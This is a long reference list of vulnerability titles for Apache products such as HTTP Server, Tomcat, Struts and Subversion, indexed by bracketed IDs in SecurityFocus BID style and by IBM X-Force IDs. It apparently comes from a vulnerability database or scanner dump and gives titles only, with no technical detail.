| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
| [20527] Apache Mod_TCL Remote Format String Vulnerability
| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
| [19106] Apache Tomcat Information Disclosure Vulnerability
| [18138] Apache James SMTP Denial Of Service Vulnerability
| [17342] Apache Struts Multiple Remote Vulnerabilities
| [17095] Apache Log4Net Denial Of Service Vulnerability
| [16916] Apache mod_python FileSession Code Execution Vulnerability
| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
| [15177] PHP Apache 2 Local Denial of Service Vulnerability
| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
| [14106] Apache HTTP Request Smuggling Vulnerability
| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
| [11471] Apache mod_include Local Buffer Overflow Vulnerability
| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
| [11094] Apache mod_ssl Denial Of Service Vulnerability
| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
| [10478] ClueCentral Apache Suexec Patch Security Weakness
| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
| [9921] Apache Connection Blocking Denial Of Service Vulnerability
| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
| [9733] Apache Cygwin Directory Traversal Vulnerability
| [9599] Apache mod_php Global Variables Information Disclosure Weakness
| [9590] Apache-SSL Client Certificate Forging Vulnerability
| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
| [8898] Red Hat Apache Directory Index Default Configuration Error
| [8883] Apache Cocoon Directory Traversal Vulnerability
| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
| [8707] Apache htpasswd Password Entropy Weakness
| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
| [8226] Apache HTTP Server Multiple Vulnerabilities
| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
| [7255] Apache Web Server File Descriptor Leakage Vulnerability
| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
| [6939] Apache Web Server ETag Header Information Disclosure Weakness
| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
| [6117] Apache mod_php File Descriptor Leakage Vulnerability
| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
14621| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
14622| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
14623| [5992] Apache HTDigest Insecure Temporary File Vulnerability
14624| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
14625| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
14626| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
14627| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
14628| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
14629| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
14630| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
14631| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
14632| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
14633| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
14634| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
14635| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
14636| [5485] Apache 2.0 Path Disclosure Vulnerability
14637| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
14638| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
14639| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
14640| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
14641| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
14642| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
14643| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
14644| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
14645| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
14646| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
14647| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
14648| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
14649| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
14650| [4437] Apache Error Message Cross-Site Scripting Vulnerability
14651| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
14652| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
14653| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
14654| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
14655| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
14656| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
14657| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
14658| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
14659| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
14660| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
14661| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
14662| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
14663| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
14664| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
14665| [3596] Apache Split-Logfile File Append Vulnerability
14666| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
14667| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
14668| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
14669| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
14670| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
14671| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
14672| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
14673| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
14674| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
14675| [3169] Apache Server Address Disclosure Vulnerability
14676| [3009] Apache Possible Directory Index Disclosure Vulnerability
14677| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
14678| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
14679| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
14680| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
14681| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
14682| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
14683| [2216] Apache Web Server DoS Vulnerability
14684| [2182] Apache /tmp File Race Vulnerability
14685| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
14686| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
14687| [1821] Apache mod_cookies Buffer Overflow Vulnerability
14688| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
14689| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
14690| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
14691| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
14692| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
14693| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
14694| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
14695| [1457] Apache::ASP source.asp Example Script Vulnerability
14696| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
14697| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
14698|
14699| IBM X-Force - https://exchange.xforce.ibmcloud.com:
14700| [86258] Apache CloudStack text fields cross-site scripting
14701| [85983] Apache Subversion mod_dav_svn module denial of service
14702| [85875] Apache OFBiz UEL code execution
14703| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
14704| [85871] Apache HTTP Server mod_session_dbd unspecified
14705| [85756] Apache Struts OGNL expression command execution
14706| [85755] Apache Struts DefaultActionMapper class open redirect
14707| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
14708| [85574] Apache HTTP Server mod_dav denial of service
14709| [85573] Apache Struts Showcase App OGNL code execution
14710| [85496] Apache CXF denial of service
14711| [85423] Apache Geronimo RMI classloader code execution
14712| [85326] Apache Santuario XML Security for C++ buffer overflow
14713| [85323] Apache Santuario XML Security for Java spoofing
14714| [85319] Apache Qpid Python client SSL spoofing
14715| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
14716| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
14717| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
14718| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
14719| [84952] Apache Tomcat CVE-2012-3544 denial of service
14720| [84763] Apache Struts CVE-2013-2135 security bypass
14721| [84762] Apache Struts CVE-2013-2134 security bypass
14722| [84719] Apache Subversion CVE-2013-2088 command execution
14723| [84718] Apache Subversion CVE-2013-2112 denial of service
14724| [84717] Apache Subversion CVE-2013-1968 denial of service
14725| [84577] Apache Tomcat security bypass
14726| [84576] Apache Tomcat symlink
14727| [84543] Apache Struts CVE-2013-2115 security bypass
14728| [84542] Apache Struts CVE-2013-1966 security bypass
14729| [84154] Apache Tomcat session hijacking
14730| [84144] Apache Tomcat denial of service
14731| [84143] Apache Tomcat information disclosure
14732| [84111] Apache HTTP Server command execution
14733| [84043] Apache Virtual Computing Lab cross-site scripting
14734| [84042] Apache Virtual Computing Lab cross-site scripting
14735| [83782] Apache CloudStack information disclosure
14736| [83781] Apache CloudStack security bypass
14737| [83720] Apache ActiveMQ cross-site scripting
14738| [83719] Apache ActiveMQ denial of service
14739| [83718] Apache ActiveMQ denial of service
14740| [83263] Apache Subversion denial of service
14741| [83262] Apache Subversion denial of service
14742| [83261] Apache Subversion denial of service
14743| [83259] Apache Subversion denial of service
14744| [83035] Apache mod_ruid2 security bypass
14745| [82852] Apache Qpid federation_tag security bypass
14746| [82851] Apache Qpid qpid::framing::Buffer denial of service
14747| [82758] Apache Rave User RPC API information disclosure
14748| [82663] Apache Subversion svn_fs_file_length() denial of service
14749| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
14750| [82641] Apache Qpid AMQP denial of service
14751| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
14752| [82618] Apache Commons FileUpload symlink
14753| [82360] Apache HTTP Server manager interface cross-site scripting
14754| [82359] Apache HTTP Server hostnames cross-site scripting
14755| [82338] Apache Tomcat log/logdir information disclosure
14756| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
14757| [82268] Apache OpenJPA deserialization command execution
14758| [81981] Apache CXF UsernameTokens security bypass
14759| [81980] Apache CXF WS-Security security bypass
14760| [81398] Apache OFBiz cross-site scripting
14761| [81240] Apache CouchDB directory traversal
14762| [81226] Apache CouchDB JSONP code execution
14763| [81225] Apache CouchDB Futon user interface cross-site scripting
14764| [81211] Apache Axis2/C SSL spoofing
14765| [81167] Apache CloudStack DeployVM information disclosure
14766| [81166] Apache CloudStack AddHost API information disclosure
14767| [81165] Apache CloudStack createSSHKeyPair API information disclosure
14768| [80518] Apache Tomcat cross-site request forgery security bypass
14769| [80517] Apache Tomcat FormAuthenticator security bypass
14770| [80516] Apache Tomcat NIO denial of service
14771| [80408] Apache Tomcat replay-countermeasure security bypass
14772| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
14773| [80317] Apache Tomcat slowloris denial of service
14774| [79984] Apache Commons HttpClient SSL spoofing
14775| [79983] Apache CXF SSL spoofing
14776| [79830] Apache Axis2/Java SSL spoofing
14777| [79829] Apache Axis SSL spoofing
14778| [79809] Apache Tomcat DIGEST security bypass
14779| [79806] Apache Tomcat parseHeaders() denial of service
14780| [79540] Apache OFBiz unspecified
14781| [79487] Apache Axis2 SAML security bypass
14782| [79212] Apache Cloudstack code execution
14783| [78734] Apache CXF SOAP Action security bypass
14784| [78730] Apache Qpid broker denial of service
14785| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
14786| [78563] Apache mod_pagespeed module unspecified cross-site scripting
14787| [78562] Apache mod_pagespeed module security bypass
14788| [78454] Apache Axis2 security bypass
14789| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
14790| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
14791| [78321] Apache Wicket unspecified cross-site scripting
14792| [78183] Apache Struts parameters denial of service
14793| [78182] Apache Struts cross-site request forgery
14794| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
14795| [77987] mod_rpaf module for Apache denial of service
14796| [77958] Apache Struts skill name code execution
14797| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
14798| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
14799| [77568] Apache Qpid broker security bypass
14800| [77421] Apache Libcloud spoofing
14801| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
14802| [77046] Oracle Solaris Apache HTTP Server information disclosure
14803| [76837] Apache Hadoop information disclosure
14804| [76802] Apache Sling CopyFrom denial of service
14805| [76692] Apache Hadoop symlink
14806| [76535] Apache Roller console cross-site request forgery
14807| [76534] Apache Roller weblog cross-site scripting
14808| [76152] Apache CXF elements security bypass
14809| [76151] Apache CXF child policies security bypass
14810| [75983] MapServer for Windows Apache file include
14811| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
14812| [75558] Apache POI denial of service
14813| [75545] PHP apache_request_headers() buffer overflow
14814| [75302] Apache Qpid SASL security bypass
14815| [75211] Debian GNU/Linux apache 2 cross-site scripting
14816| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
14817| [74871] Apache OFBiz FlexibleStringExpander code execution
14818| [74870] Apache OFBiz multiple cross-site scripting
14819| [74750] Apache Hadoop unspecified spoofing
14820| [74319] Apache Struts XSLTResult.java file upload
14821| [74313] Apache Traffic Server header buffer overflow
14822| [74276] Apache Wicket directory traversal
14823| [74273] Apache Wicket unspecified cross-site scripting
14824| [74181] Apache HTTP Server mod_fcgid module denial of service
14825| [73690] Apache Struts OGNL code execution
14826| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
14827| [73100] Apache MyFaces in directory traversal
14828| [73096] Apache APR hash denial of service
14829| [73052] Apache Struts name cross-site scripting
14830| [73030] Apache CXF UsernameToken security bypass
14831| [72888] Apache Struts lastName cross-site scripting
14832| [72758] Apache HTTP Server httpOnly information disclosure
14833| [72757] Apache HTTP Server MPM denial of service
14834| [72585] Apache Struts ParameterInterceptor security bypass
14835| [72438] Apache Tomcat Digest security bypass
14836| [72437] Apache Tomcat Digest security bypass
14837| [72436] Apache Tomcat DIGEST security bypass
14838| [72425] Apache Tomcat parameter denial of service
14839| [72422] Apache Tomcat request object information disclosure
14840| [72377] Apache HTTP Server scoreboard security bypass
14841| [72345] Apache HTTP Server HTTP request denial of service
14842| [72229] Apache Struts ExceptionDelegator command execution
14843| [72089] Apache Struts ParameterInterceptor directory traversal
14844| [72088] Apache Struts CookieInterceptor command execution
14845| [72047] Apache Geronimo hash denial of service
14846| [72016] Apache Tomcat hash denial of service
14847| [71711] Apache Struts OGNL expression code execution
14848| [71654] Apache Struts interfaces security bypass
14849| [71620] Apache ActiveMQ failover denial of service
14850| [71617] Apache HTTP Server mod_proxy module information disclosure
14851| [71508] Apache MyFaces EL security bypass
14852| [71445] Apache HTTP Server mod_proxy security bypass
14853| [71203] Apache Tomcat servlets privilege escalation
14854| [71181] Apache HTTP Server ap_pregsub() denial of service
14855| [71093] Apache HTTP Server ap_pregsub() buffer overflow
14856| [70336] Apache HTTP Server mod_proxy information disclosure
14857| [69804] Apache HTTP Server mod_proxy_ajp denial of service
14858| [69472] Apache Tomcat AJP security bypass
14859| [69396] Apache HTTP Server ByteRange filter denial of service
14860| [69394] Apache Wicket multi window support cross-site scripting
14861| [69176] Apache Tomcat XML information disclosure
14862| [69161] Apache Tomcat jsvc information disclosure
14863| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
14864| [68541] Apache Tomcat sendfile information disclosure
14865| [68420] Apache XML Security denial of service
14866| [68238] Apache Tomcat JMX information disclosure
14867| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
14868| [67804] Apache Subversion control rules information disclosure
14869| [67803] Apache Subversion control rules denial of service
14870| [67802] Apache Subversion baselined denial of service
14871| [67672] Apache Archiva multiple cross-site scripting
14872| [67671] Apache Archiva multiple cross-site request forgery
14873| [67564] Apache APR apr_fnmatch() denial of service
14874| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
14875| [67515] Apache Tomcat annotations security bypass
14876| [67480] Apache Struts s:submit information disclosure
14877| [67414] Apache APR apr_fnmatch() denial of service
14878| [67356] Apache Struts javatemplates cross-site scripting
14879| [67354] Apache Struts Xwork cross-site scripting
14880| [66676] Apache Tomcat HTTP BIO information disclosure
14881| [66675] Apache Tomcat web.xml security bypass
14882| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
14883| [66241] Apache HttpComponents information disclosure
14884| [66154] Apache Tomcat ServletSecurity security bypass
14885| [65971] Apache Tomcat ServletSecurity security bypass
14886| [65876] Apache Subversion mod_dav_svn denial of service
14887| [65343] Apache Continuum unspecified cross-site scripting
14888| [65162] Apache Tomcat NIO connector denial of service
14889| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
14890| [65160] Apache Tomcat HTML Manager interface cross-site scripting
14891| [65159] Apache Tomcat ServletContect security bypass
14892| [65050] Apache CouchDB web-based administration UI cross-site scripting
14893| [64773] Oracle HTTP Server Apache Plugin unauthorized access
14894| [64473] Apache Subversion blame -g denial of service
14895| [64472] Apache Subversion walk() denial of service
14896| [64407] Apache Axis2 CVE-2010-0219 code execution
14897| [63926] Apache Archiva password privilege escalation
14898| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
14899| [63493] Apache Archiva credentials cross-site request forgery
14900| [63477] Apache Tomcat HttpOnly session hijacking
14901| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
14902| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
14903| [62959] Apache Shiro filters security bypass
14904| [62790] Apache Perl cgi module denial of service
14905| [62576] Apache Qpid exchange denial of service
14906| [62575] Apache Qpid AMQP denial of service
14907| [62354] Apache Qpid SSL denial of service
14908| [62235] Apache APR-util apr_brigade_split_line() denial of service
14909| [62181] Apache XML-RPC SAX Parser information disclosure
14910| [61721] Apache Traffic Server cache poisoning
14911| [61202] Apache Derby BUILTIN authentication functionality information disclosure
14912| [61186] Apache CouchDB Futon cross-site request forgery
14913| [61169] Apache CXF DTD denial of service
14914| [61070] Apache Jackrabbit search.jsp SQL injection
